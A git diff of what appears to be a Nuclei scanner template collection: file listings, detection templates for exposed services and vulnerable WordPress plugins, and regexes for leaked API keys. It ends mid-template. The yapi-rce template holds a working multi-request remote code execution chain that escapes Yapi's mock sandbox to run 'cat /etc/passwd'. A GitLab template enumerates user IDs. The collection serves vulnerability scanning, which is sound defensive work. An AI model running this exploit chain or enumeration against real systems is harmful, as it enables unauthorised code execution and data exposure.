./poc/social/ultimate-social-media-icons-d2c398058bc8f86751e4d1945e50d5db.yaml ./poc/social/ultimate-social-media-icons-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/ultimate-social-media-icons-de64358b5df4cf57531b6078bf1f5f13.yaml +./poc/social/ultimate-social-media-icons-de7de394482ec451d74469e2163b8cf6.yaml ./poc/social/ultimate-social-media-icons-f18fc3a7c1a1d5f1404305872fbe1bee.yaml ./poc/social/ultimate-social-media-icons-fe81b44a4faa0a9a16edfb848caa8161.yaml ./poc/social/ultimate-social-media-icons-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -95985,6 +96262,7 @@ ./poc/social/woo-ecommerce-tracking-for-google-and-facebook-6477bf18cad6c823db485408d49b337b.yaml ./poc/social/woo-ecommerce-tracking-for-google-and-facebook-c4587045b8e8e54ce8b51828852ef7ce.yaml ./poc/social/woo-ecommerce-tracking-for-google-and-facebook.yaml +./poc/social/woo-social-login-5d26f7f4cd542d88ac86877ec3302d5a.yaml ./poc/social/woo-social-login-d6ff5be910b5d6bdcf7d2ef1b1e7a302.yaml ./poc/social/woo-social-login-df594682d71b9580592ccaad26e0910f.yaml ./poc/social/woo-social-login.yaml @@ -97291,6 +97569,7 @@ ./poc/sql/CVE-2023-5096-6e62427777121f73fbdb340a70c9400c.yaml ./poc/sql/CVE-2023-5109-b0de9187765a76ee59d803e4db708341.yaml ./poc/sql/CVE-2023-5120-ab1e0fcdb58e12e01c44c5c71813d8ea.yaml +./poc/sql/CVE-2023-5127-a7f79b7db76a186e4a88065c0255d51e.yaml ./poc/sql/CVE-2023-5128-f330d9ed9b9790ec415eadb0e7d3a532.yaml ./poc/sql/CVE-2023-5133-9a6dba01336aed687e67182501fe4286.yaml ./poc/sql/CVE-2023-51357-b7ece33e185ddf74588dbe9ffe47f237.yaml @@ -97427,6 +97706,7 @@ ./poc/sql/CVE-2024-1338-330ff51f2acffceb7b06d0480121ddb6.yaml ./poc/sql/CVE-2024-1341-bff799b451bc049aa37cdb6d83b988bb.yaml ./poc/sql/CVE-2024-1365-3a1de3e4cf1c5556bf2dba2fda674da0.yaml +./poc/sql/CVE-2024-1375-1c5d367114d7ddb0cfb5bf0cfba7e6f4.yaml ./poc/sql/CVE-2024-1381-186d97fc9be38ea9fe9fdb2de3135662.yaml ./poc/sql/CVE-2024-1386-9f49adb4a1553fb7e5f119061067e3f5.yaml ./poc/sql/CVE-2024-1415-0a567602e6e0c32096c45bed3d0db7cc.yaml @@ -97856,6 +98136,9 @@ ./poc/sql/CVE-2024-6296-4b00c016cb0473ed21e9c85ab9e1bedb.yaml ./poc/sql/CVE-2024-6318-3e5c3aa983dadddb0cd29d87a8fa5d4c.yaml ./poc/sql/CVE-2024-6320-7adb22eb7d927b66f14c411499398cd7.yaml +./poc/sql/CVE-2024-6340-b92db2bd08ff1e8a54a1c37865c95bfd.yaml +./poc/sql/CVE-2024-6392-fedb5f8d165b9e77244d2586825aec11.yaml +./poc/sql/CVE-2024-6588-af347ddbbf742df5b2786c5ede788153.yaml ./poc/sql/Changdao-165-SQLi.yaml ./poc/sql/Cmseasy-Http-Head-sqli.yaml ./poc/sql/Cmseasy-celive-sqli.yaml @@ -98962,6 +99245,7 @@ ./poc/sql/count-per-day-311cd82477fed81bb66239db49d949d3.yaml ./poc/sql/countdown-builder-466d118ca8f9a3617f4ecdb86e11688a.yaml ./poc/sql/counter-yandex-metrica-c194310014d30316dbbe28440ddf1a9d.yaml +./poc/sql/counterpoint-4e848d0e70e34ae5f5dbfea5a0844aac.yaml ./poc/sql/country-state-city-auto-dropdown-dbb36fa80809f3531c17675200623d4b.yaml ./poc/sql/coupon-referral-program-c51ccc109538e9c65ff37db8c8b7c99e.yaml ./poc/sql/court-reservation-6477bf18cad6c823db485408d49b337b.yaml @@ -99776,6 +100060,7 @@ ./poc/sql/glorious-sites-installer-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/glossary-by-codeat-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/glpi-9.3.3-sql-injection(1).yaml +./poc/sql/glpi-9.3.3-sql-injection.yaml ./poc/sql/gm-woo-product-list-widget-c7d55594227f574d6f5e336946adb772.yaml ./poc/sql/go-fetch-jobs-wp-job-manager-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/go-viral-6477bf18cad6c823db485408d49b337b.yaml @@ -100768,6 +101053,7 @@ ./poc/sql/power-ups-for-elementor-d0413a5c73e1be1ef64a4395372cedbc.yaml ./poc/sql/poweredbygaysocial-mastodon-instance.yaml ./poc/sql/powerpack-lite-for-elementor-ad14dd6ee6fc720953cd1e0db5901606.yaml +./poc/sql/powerpress-449cbf711de87857af4b230f1462edb6.yaml ./poc/sql/ppc-fraud-detctor-d32e1a41bbf76818ddb943d8c1268b25.yaml ./poc/sql/pre-orders-for-woocommerce-687db182b0c9655d84523f55416267f1.yaml ./poc/sql/predictive-search-e70439748057551a81371b42063db74f.yaml @@ -101069,6 +101355,7 @@ ./poc/sql/sassy-social-share-380a93a6eb0678027b6e7c5b3db32454.yaml ./poc/sql/sassy-social-share-7fe747d58f69000f9f8b8a660dbcbbd0.yaml ./poc/sql/save-as-pdf-by-pdfcrowd-39048db87de4975f2c9462e53dd2a695.yaml +./poc/sql/save-as-pdf-by-pdfcrowd-6b6b69f772d7fc2cbdb3b9d93f6ab72a.yaml ./poc/sql/sayfa-sayac-f524db895f62b09911f26856dc85a235.yaml ./poc/sql/sb-elementor-contact-form-db-3c7d26cfa4ebee3ab739a68c3f7eb8a5.yaml ./poc/sql/sb-elementor-contact-form-db-3e84b2d2309a7db5df4ac7ee289dbb8b.yaml @@ -102011,6 +102298,7 @@ ./poc/sql/woo-vietnam-checkout-0e7ca88eb27dbda2fa884ee7131c0268.yaml ./poc/sql/woo-vietnam-checkout-e75dfed10d43db057e0e7c1a46fc703a.yaml ./poc/sql/woo-vipps-c550bd7e537da03f30bdd76db3d43c83.yaml +./poc/sql/woo-wallet-39d0e9bf98ca6e67db16261da42d6252.yaml ./poc/sql/woo-wallet-5e20db3c69cb1aa130ce0ae299be0d55.yaml ./poc/sql/woo-wallet-af1fdcc2a34052beddb89d1cc2e78459.yaml ./poc/sql/woo-wholesale-pricing-6477bf18cad6c823db485408d49b337b.yaml @@ -102142,6 +102430,7 @@ ./poc/sql/wordpress-db-repair-11252.yaml ./poc/sql/wordpress-db-repair-11253.yaml ./poc/sql/wordpress-db-repair-11254.yaml +./poc/sql/wordpress-db-repair-11255.yaml ./poc/sql/wordpress-db-repair.yaml ./poc/sql/wordpress-db3daefc79ef0c3afc5d2a722651f6df.yaml ./poc/sql/wordpress-e2566e3cb656dbaa90bc1ac1fbedb4e7.yaml @@ -102600,6 +102889,7 @@ ./poc/sql/wpdiscuz-c2970ebd358e41db5516666a827b0dd2.yaml ./poc/sql/wpdiscuz-dc128b4d9b60031ecc736abdb2ff6317.yaml ./poc/sql/wpe-indoshipping-10dbcd54baca6e6ee04759bca5983c58.yaml +./poc/sql/wpfavicon-b8d7827bcbedea7a40db5bb08217d076.yaml ./poc/sql/wpforms-lite-66ca6dbf7e54d3f9d0cc66ebad78a311.yaml ./poc/sql/wpforo-04b9b42183fab163d0ecfec567eac5db.yaml ./poc/sql/wpforo-eeecbea748b4788b1e8348663a9cddb1.yaml @@ -103236,6 +103526,7 @@ ./poc/sql_injection/glodon-linkworks-getuserbyusercode-sqli.yaml ./poc/sql_injection/glodon-linkworks-sqli.yaml ./poc/sql_injection/glpi-9.3.3-sql-injection(1).yaml +./poc/sql_injection/glpi-9.3.3-sql-injection.yaml ./poc/sql_injection/hasura-graphql-psql-exec-7899.yaml ./poc/sql_injection/hasura-graphql-psql-exec-7900.yaml ./poc/sql_injection/hasura-graphql-psql-exec-7901.yaml @@ -104009,6 +104300,7 @@ ./poc/ssrf/w3c-total-cache-ssrf-11080.yaml ./poc/ssrf/w3c-total-cache-ssrf-11081.yaml ./poc/ssrf/w3c-total-cache-ssrf.yaml +./poc/ssrf/weaver-ecology-getfileviewurl-ssrf.yaml ./poc/ssrf/weblogic-ssrf.yaml ./poc/ssrf/weblogic-ssrf.yml ./poc/ssrf/webpagetest-ssrf.yaml @@ -105499,6 +105791,7 @@ ./poc/web/honeywell-web-controller-7993.yaml ./poc/web/honeywell-web-controller-7994.yaml ./poc/web/honeywell-web-controller-7995.yaml +./poc/web/honeywell-web-controller-7996.yaml ./poc/web/honeywell-web-controller.yaml ./poc/web/honeywell-xl-web-controller.yaml ./poc/web/horde-webmail-login.yaml @@ -105562,6 +105855,8 @@ ./poc/web/indigitall-web-push-notifications-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/web/indigitall-web-push-notifications-plugin.yaml ./poc/web/indigitall-web-push-notifications.yaml +./poc/web/insecure-webview-content.yaml +./poc/web/insecure-webview-ssl.yaml ./poc/web/ip-guard-webserver-rce.yaml ./poc/web/ip_guard_webserver_view_rce.yaml ./poc/web/iplanet-web-server-8189.yaml @@ -108397,6 +108692,7 @@ ./poc/wordpress/wordpress-db-repair-11252.yaml ./poc/wordpress/wordpress-db-repair-11253.yaml ./poc/wordpress/wordpress-db-repair-11254.yaml +./poc/wordpress/wordpress-db-repair-11255.yaml ./poc/wordpress/wordpress-db-repair.yaml ./poc/wordpress/wordpress-db3daefc79ef0c3afc5d2a722651f6df.yaml ./poc/wordpress/wordpress-dc0f502ac4588bfe8cd3ddc00f203d36.yaml @@ -108571,6 +108867,7 @@ ./poc/wordpress/wordpress-language-7a04dfac5ff879ee9a27e2783540d3cb.yaml ./poc/wordpress/wordpress-language.yaml ./poc/wordpress/wordpress-lfi(1).yaml +./poc/wordpress/wordpress-lfi.yaml ./poc/wordpress/wordpress-login-11293.yaml ./poc/wordpress/wordpress-login-11294.yaml ./poc/wordpress/wordpress-login-11295.yaml @@ -108589,6 +108886,7 @@ ./poc/wordpress/wordpress-nextgen-galleryview-9a21a4e93f5e7f3460704eb270d168b3.yaml ./poc/wordpress/wordpress-nextgen-galleryview-b38873d959911b91d24ad7af1d2c3313.yaml ./poc/wordpress/wordpress-nextgen-galleryview.yaml +./poc/wordpress/wordpress-notification-bar-c1a99a966c3b24df1317586247f7c53a.yaml ./poc/wordpress/wordpress-path-disclosure.yaml ./poc/wordpress/wordpress-ping-optimizer-7eaa92d034f05b5a1d27fec5aa31d801.yaml ./poc/wordpress/wordpress-ping-optimizer-e65a5c16588355716965e14ae0b7e949.yaml @@ -109272,6 +109570,7 @@ ./poc/wordpress/wp-cafe-28702717e45a9d745fa84ce48ee68596.yaml ./poc/wordpress/wp-cafe-5269723aa48cc3633b34bb219061f5cb.yaml ./poc/wordpress/wp-cafe-63d9cbbb1db1525552f97b30104582df.yaml +./poc/wordpress/wp-cafe-68931e117cd1bb8fea7035cc6312bf1d.yaml ./poc/wordpress/wp-cafe-7475907085b3a508d5e606ff372fe89b.yaml ./poc/wordpress/wp-cafe-799b6ed7ae4270220ee678fbc9c9c139.yaml ./poc/wordpress/wp-cafe-992f487973d4002f1f3fc91d41f43c14.yaml @@ -109494,6 +109793,7 @@ ./poc/wordpress/wp-content-filter.yaml ./poc/wordpress/wp-content-pilot-39a76deb340cd904a0e167754c14efca.yaml ./poc/wordpress/wp-content-pilot.yaml +./poc/wordpress/wp-cookie-law-info-1482e7982321747b7cd5ff73a34a6241.yaml ./poc/wordpress/wp-cookie-user-info-d2666c85e1e86cfe042cf280f363f5ef.yaml ./poc/wordpress/wp-cookie-user-info.yaml ./poc/wordpress/wp-cookiechoise-49c784dadada512317c333c6a9b682b5.yaml @@ -111550,6 +111850,7 @@ ./poc/wordpress/wp-popups-lite-397d56c4826cb39d4978e607d024b3f6.yaml ./poc/wordpress/wp-popups-lite-482e13507074a152afd1c369afb2758f.yaml ./poc/wordpress/wp-popups-lite-69ef67ee7aec095c81a6e3175b553ce1.yaml +./poc/wordpress/wp-popups-lite-8a0bb5bdfaa7dceea6e2749ac7444e7f.yaml ./poc/wordpress/wp-popups-lite-baee9ab43bcd7fa06c84c363fb58f062.yaml ./poc/wordpress/wp-popups-lite.yaml ./poc/wordpress/wp-portfolio-d54683e133d1480afce7e8fc38e46a85.yaml @@ -112686,6 +112987,7 @@ ./poc/wordpress/wp-topbar-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-topbar-plugin.yaml ./poc/wordpress/wp-topbar.yaml +./poc/wordpress/wp-total-branding-a93e0c941bc967f370dfcf2eff6f96b0.yaml ./poc/wordpress/wp-total-hacks-34cb81fc3abe0bb634ca98615a87562a.yaml ./poc/wordpress/wp-total-hacks.yaml ./poc/wordpress/wp-touch-redirect.yaml @@ -113366,6 +113668,7 @@ ./poc/wordpress/wpeprivate_leak.yaml ./poc/wordpress/wpextended-308870d3518617d4a2ead1aea9124d61.yaml ./poc/wordpress/wpextended.yaml +./poc/wordpress/wpfavicon-b8d7827bcbedea7a40db5bb08217d076.yaml ./poc/wordpress/wpforms-12c717c4e562d85a3a1cb61be261222c.yaml ./poc/wordpress/wpforms-4352b6a673eb6d53e9430ff458224cc5.yaml ./poc/wordpress/wpforms-494f099657b30036fc00d5efe47f93e7.yaml diff --git a/poc/apache/default-apache2-page-6806.yaml b/poc/apache/default-apache2-page-6806.yaml index 001fda6ecd..074ad94a7d 100644 --- a/poc/apache/default-apache2-page-6806.yaml +++ b/poc/apache/default-apache2-page-6806.yaml @@ -3,8 +3,8 @@ info: name: Apache2 Default Test Page author: dhiyaneshDk severity: info - metadata: - shodan-query: http.title:"Apache2 Debian Default Page:" + reference: + - https://www.shodan.io/search?query=http.title%3A%22Apache2+Debian+Default+Page%3A+It+works%22 tags: tech,apache requests: - method: GET diff --git a/poc/api/gitlab-api-user-enum-7668.yaml b/poc/api/gitlab-api-user-enum-7668.yaml index da88f8d2fa..bbc5736050 100644 --- a/poc/api/gitlab-api-user-enum-7668.yaml +++ b/poc/api/gitlab-api-user-enum-7668.yaml @@ -1,10 +1,14 @@ id: gitlab-api-user-enum + info: author: Suman_Kar name: GitLab - User Information Disclosure Via Open API severity: medium reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 + metadata: + shodan-query: http.title:"GitLab" tags: gitlab,enum,misconfig,disclosure + requests: - raw: - | @@ -12,8 +16,10 @@ requests: Host: {{Hostname}} Accept: application/json, text/plain, */* Referer: {{BaseURL}} + payloads: uid: helpers/wordlists/numbers.txt + stop-at-first-match: true matchers-condition: and matchers: @@ -24,10 +30,12 @@ requests: - "username.*" - "id.*" - "name.*" + - type: word part: header words: - "application/json" + - type: status status: - 200 diff --git a/poc/api/google-api-7772.yaml b/poc/api/google-api-7772.yaml index b5b0737aa7..1242ce0367 100644 --- a/poc/api/google-api-7772.yaml +++ b/poc/api/google-api-7772.yaml @@ -1,12 +1,15 @@ id: google-api-key-file + info: name: Google API key author: gaurang severity: info tags: token,file,google + file: - extensions: - all + extractors: - type: regex regex: diff --git a/poc/api/google-api-key-7770.yaml b/poc/api/google-api-key-7770.yaml index c1b8b0434c..87d61eaa24 100644 --- a/poc/api/google-api-key-7770.yaml +++ b/poc/api/google-api-key-7770.yaml @@ -1,20 +1,23 @@ id: google-api-key + info: name: Google API Key author: Swissky - severity: medium -requests: + severity: info + metadata: + max-request: 2 + tags: exposure,token,google + +http: - method: GET path: - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "AIza[0-9A-Za-z\\-_]{35}" + - "{{BaseURL}}/hopfully404" + extractors: - type: regex part: body regex: - "AIza[0-9A-Za-z\\-_]{35}" + +# digest: 4a0a004730450221008529a1cf21d244ce3327f73d3d68a4e1afc76d0dab02130fa43f449db87fb51802200b6b4d64369e56d8ebba8796e30b0cee88ca1318014c35dee345905fffdb4a3c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/hardcoded-api-keys.yaml b/poc/api/hardcoded-api-keys.yaml new file mode 100644 index 0000000000..69cf27a6d5 --- /dev/null +++ b/poc/api/hardcoded-api-keys.yaml @@ -0,0 +1,27 @@ +id: hardcoded-api-keys + +info: + name: Hardcoded API Keys + author: YoruYagami + severity: high + description: | + This template detects hardcoded API keys in the source code. Hardcoding API keys can lead to unauthorized access and abuse if the keys are extracted by attackers. It is recommended to securely store and manage API keys. + remediation: | + To remediate this issue, remove hardcoded API keys from the source code and use secure storage solutions such as environment variables, encrypted storage, or secure key management services. Example: + + ```java + // Store API keys securely, avoid hardcoding + String apiKey = getApiKeyFromSecureStorage(); + ``` + +file: + - extensions: + - java + - xml + - json + + matchers: + - type: regex + regex: + - "apikey=\"[A-Za-z0-9]+\"" + - "API_KEY = \"[A-Za-z0-9]+\"" diff --git a/poc/api/json-api-user.yaml b/poc/api/json-api-user.yaml new file mode 100644 index 0000000000..6c8d0ae20e --- /dev/null +++ b/poc/api/json-api-user.yaml @@ -0,0 +1,59 @@ +id: json-api-user + +info: + name: > + JSON API User <= 3.9.3 - Unauthenticated Privilege Escalation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a4a26f60-5912-4d4a-8ef8-e4357c1fb1ff?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/json-api-user/" + google-query: inurl:"/wp-content/plugins/json-api-user/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,json-api-user,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/json-api-user/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "json-api-user" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.9.3') \ No newline at end of file diff --git a/poc/api/kube-api-nodes-8507.yaml b/poc/api/kube-api-nodes-8507.yaml index 8e44c71d24..29b885b67e 100644 --- a/poc/api/kube-api-nodes-8507.yaml +++ b/poc/api/kube-api-nodes-8507.yaml @@ -1,7 +1,7 @@ id: kube-api-nodes info: name: Kube API Nodes - author: sharath + author: sharath,ritikchaddha severity: info description: Scans for kube nodes tags: tech,k8s,kubernetes,devops,kube @@ -9,14 +9,17 @@ requests: - method: GET path: - "{{BaseURL}}/api/v1/nodes" - matchers-condition: and + matchers-condition: or matchers: - - type: status - status: - - 200 - type: word part: body words: - '"NodeList":' - '"items":' condition: and + - type: word + part: body + words: + - '"containerRuntimeVersion"' + - '"kubeletVersion": "v' + condition: and diff --git a/poc/api/mailgun-api-11855.yaml b/poc/api/mailgun-api-11855.yaml index 5b84ad10f0..ea2ef20b94 100644 --- a/poc/api/mailgun-api-11855.yaml +++ b/poc/api/mailgun-api-11855.yaml @@ -1,13 +1,16 @@ id: mailgun-api-key + info: name: Mailgun API Key author: gaurang severity: high - tags: token,file,mailgun + tags: file,keys,token,mailgun file: - extensions: - all + extractors: - type: regex regex: - "key-[0-9a-zA-Z]{32}" +# digest: 4a0a00473045022006098cd86f41bfb24a9c4c7c6bfc1a855c71c69e8b834739e5ffc4567261266c022100bd407109d7d54367361ebda630747d01a6ba308679d3f50a1654629aa9da4873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/api/mstore-api-fcf575731390b94d640824227bb01949.yaml b/poc/api/mstore-api-fcf575731390b94d640824227bb01949.yaml new file mode 100644 index 0000000000..7486fbc4c9 --- /dev/null +++ b/poc/api/mstore-api-fcf575731390b94d640824227bb01949.yaml @@ -0,0 +1,59 @@ +id: mstore-api-fcf575731390b94d640824227bb01949 + +info: + name: > + MStore API – Create Native Android & iOS Apps On The Cloud <= 4.14.7 - Authentication Bypass + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/17d8e2e9-5e3f-433b-be1a-6ea765eba547?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/mstore-api/" + google-query: inurl:"/wp-content/plugins/mstore-api/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,mstore-api,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mstore-api" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.14.7') \ No newline at end of file diff --git a/poc/api/pictatic-api-key-9575.yaml b/poc/api/pictatic-api-key-9575.yaml index 946aed1ebf..ec20f07569 100644 --- a/poc/api/pictatic-api-key-9575.yaml +++ b/poc/api/pictatic-api-key-9575.yaml @@ -1,13 +1,16 @@ id: pictatic-api-key + info: name: Pictatic API Key author: gaurang severity: high tags: token,file + file: - extensions: - all + extractors: - type: regex regex: - - "sk_live_[0-9a-z]{32}" + - "sk_live_[0-9a-z]{32}" \ No newline at end of file diff --git a/poc/api/slack-api(1).yaml b/poc/api/slack-api(1).yaml index ea761c24d4..51bef1c14c 100644 --- a/poc/api/slack-api(1).yaml +++ b/poc/api/slack-api(1).yaml @@ -1,15 +1,12 @@ id: slack-api - info: name: Slack API Key author: gaurang severity: high tags: token,file,slack - file: - extensions: - all - extractors: - type: regex regex: diff --git a/poc/api/strapi-page-10545.yaml b/poc/api/strapi-page-10545.yaml index 30c6851020..133c9a43ba 100644 --- a/poc/api/strapi-page-10545.yaml +++ b/poc/api/strapi-page-10545.yaml @@ -1,15 +1,17 @@ id: strapi-page + info: name: Strapi Page author: dhiyaneshDk severity: info - metadata: - shodan-query: http.title:"Welcome to your Strapi app" + reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 tags: api,strapi + requests: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: diff --git a/poc/api/twilio-api-10860.yaml b/poc/api/twilio-api-10860.yaml index f1a98cc01b..a9063bd310 100644 --- a/poc/api/twilio-api-10860.yaml +++ b/poc/api/twilio-api-10860.yaml @@ -1,13 +1,16 @@ id: twilio-api + info: name: Twilio API Key author: gaurang severity: high - tags: token,file + tags: file,keys,token file: - extensions: - all + extractors: - type: regex regex: - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" +# digest: 4b0a004830460221009edd6055d2937d438ddc5a460cb57ceaf448ee273900a3a2ff9d217329cbaf170221009df1b8754959e50ef0155608d8ea98f45e87c59221868f7ad7a762ba88ba28fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/api/wadl-api-11084.yaml b/poc/api/wadl-api-11084.yaml index 35e018d786..cabb94dfd0 100644 --- a/poc/api/wadl-api-11084.yaml +++ b/poc/api/wadl-api-11084.yaml @@ -1,12 +1,12 @@ id: wadl-api info: name: wadl file disclosure - author: 0xrudra & manuelbua + author: 0xrudra,manuelbua severity: info - tags: exposure,api - reference: | + reference: - https://github.com/dwisiswant0/wadl-dumper - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ + tags: exposure,api requests: - method: GET path: @@ -15,26 +15,24 @@ requests: - "{{BaseURL}}/api/application.wadl" - "{{BaseURL}}/api/v1/application.wadl" - "{{BaseURL}}/api/v2/application.wadl" + stop-at-first-match: true matchers: - name: http-get type: word words: - "This is simplified WADL with user and core resources only" - - "\"http://jersey.java.net/\"" + - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - condition: or - part: body - method: OPTIONS path: - "{{BaseURL}}" - "{{BaseURL}}/api/v1" - "{{BaseURL}}/api/v2" + stop-at-first-match: true matchers: - name: http-options type: word words: - "This is simplified WADL with user and core resources only" - - "\"http://jersey.java.net/\"" + - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - condition: or - part: body diff --git a/poc/api/wsdl-api-11632.yaml b/poc/api/wsdl-api-11632.yaml index 71703837f3..2471713705 100644 --- a/poc/api/wsdl-api-11632.yaml +++ b/poc/api/wsdl-api-11632.yaml @@ -1,10 +1,12 @@ id: wsdl-api + info: name: wsdl-detect author: jarijaas severity: info description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/) tags: exposure,api + requests: - method: GET path: @@ -12,4 +14,4 @@ requests: matchers: - type: word words: - - "wsdl:definitions" + - "wsdl:definitions" \ No newline at end of file diff --git a/poc/api/yapi-rce-11724.yaml b/poc/api/yapi-rce-11724.yaml index 62f4be0f79..0078f2b883 100644 --- a/poc/api/yapi-rce-11724.yaml +++ b/poc/api/yapi-rce-11724.yaml @@ -1,68 +1,60 @@ id: yapi-rce + info: name: Yapi Remote Code Execution author: pikpikcu severity: critical - tags: yapi,rce - reference: | + description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. + reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 - https://github.com/YMFE/yapi + tags: yapi,rce + requests: - raw: - | # REQUEST 1 POST /api/user/reg HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 94 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} + - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/json, text/plain, */* - Accept-Encoding: gzip + - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 106 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} + - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip + - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 89 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} + - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 382 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} + - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip + cookie-reuse: true extractors: - type: regex @@ -72,6 +64,7 @@ requests: part: body regex: - '"_id":([0-9]+),"group_name"' + - type: regex name: interface_id group: 1 @@ -79,6 +72,7 @@ requests: part: body regex: - '"req_body_form":\[\],"_id":([0-9]+)' + - type: regex name: project_id group: 1 @@ -86,12 +80,14 @@ requests: part: body regex: - '"tag":\[\],"_id":([0-9]+)' + matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body + - type: status status: - 200 diff --git a/poc/atlassian/jira-detect-8315.yaml b/poc/atlassian/jira-detect-8315.yaml index 4f24793ad5..1816dae07e 100644 --- a/poc/atlassian/jira-detect-8315.yaml +++ b/poc/atlassian/jira-detect-8315.yaml @@ -1,29 +1,14 @@ id: jira-detect - info: name: Detect Jira Issue Management Software - author: pdteam,philippedelteil + author: bauthard severity: info - tags: panel,jira - requests: - method: GET path: - "{{BaseURL}}/secure/Dashboard.jspa" - "{{BaseURL}}/jira/secure/Dashboard.jspa" - - "{{BaseURL}}/login.jsp" - - stop-at-first-match: true - redirects: true - max-redirects: 2 matchers: - type: word words: - "Project Management Software" - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'title="JiraVersion" value="([0-9.]+)' diff --git a/poc/atlassian/jira-service-desk-signup-8321.yaml b/poc/atlassian/jira-service-desk-signup-8321.yaml index 6604106545..1cfce39b45 100644 --- a/poc/atlassian/jira-service-desk-signup-8321.yaml +++ b/poc/atlassian/jira-service-desk-signup-8321.yaml @@ -1,8 +1,11 @@ id: jira-service-desk-signup + info: name: Jira Service Desk Signup author: TechbrunchFR severity: medium + tags: jira,atlassian,service + requests: - method: POST path: diff --git a/poc/atlassian/jira-unauthenticated-projects-8335.yaml b/poc/atlassian/jira-unauthenticated-projects-8335.yaml index a6bd8b968a..f8a21f8d2e 100644 --- a/poc/atlassian/jira-unauthenticated-projects-8335.yaml +++ b/poc/atlassian/jira-unauthenticated-projects-8335.yaml @@ -1,10 +1,9 @@ id: 